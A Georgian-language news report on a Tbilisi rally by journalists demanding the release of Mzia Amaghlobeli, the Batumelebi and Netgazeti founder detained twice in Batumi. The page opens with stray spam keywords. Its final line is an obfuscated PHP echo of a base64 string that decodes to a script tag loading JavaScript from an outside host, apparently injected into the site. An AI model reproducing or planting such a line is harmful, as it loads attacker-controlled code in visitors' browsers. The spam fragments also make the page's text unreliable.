celsiusi
ავერსი jaluzi

12 იანვარს თბილისში მთავრობის ადმინისტრაციის შენობასთან დამოუკიდებელმა მედიასაშუალებებმა, პროფესიული და მედიის უფლებების დამცველი ორგანიზაციების წარმომადგენლებმა სოლიდარობა გამოუცხადეს ბათუმში დაკავებულ ონლაინგამოცემების „ბათუმელების“ და „ნეტგაზეთის“ დამფუძნებელსა და დირექტორს მზია ამაღლობელს.

აქციის მონაწილე ჟურნალისტების თქმით, ამაღლობელი უკანონოდ არის დაკავებული. მედიის წარმომადგენლები ითხოვენ მზია ამაღლობელის დაუყოვნებლივ გათავისუფლებას.

„მოვუწოდებთ სპეციალურ საგამოძიებო სამსახურს, მზია ამაღლობელის უკანონოდ დაკავებისისა და არასათანადო მოპყრობის ფაქტზე სასწრაფოდ მოხდეს გამოძიება“,- აცხადებენ მედიის წარმომადგენლები.

მთავრობის ადმინისტრაციასთან შეკრებილმა მედიის წარმომადგენლებმა განცხადება წაიკითხეს, სადაც საერთაშორისო ორგანიზაციებსა და დიპლომატიურ კორპუსს მოუწოდებენ, დაინტერესდნენ ამაღლობელის საქმით. აქციის მონაწილე მედიის წარმომადგენლების განმარტებით, გავრცელებული ვიდეომასალა, სადაც აღბეჭდილია ამაღლობელის დაკავება დამუშავებულია და არ ასახავს ადგილზე განვითარებული მნიშვნელოვანი მოვლენების ნაწილს.

ბათუმში, პოლიციის მთავარ სამმართველოსთან „ბათუმელების“ და „ნეტგაზეთის“ დამფუძნებელი და დირექტორი მზია ამაღლობელი 11 იანვარს დააკავეს ბათუმის მთავარ სამმართველოსთან მიმდინარე აქციაზე, კედელზე სტიკერის გაკვრისთვის, რომელზეც ეწერა – „გაიფიცე".  იგი დაახლოებით 2 საათში გაათავისუფლეს, თუმცა გათავისუფლებიდან რამდენიმე წუთში ისევ დააკავეს. მიზეზი ჯერჯერობით უცნობია.

47
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");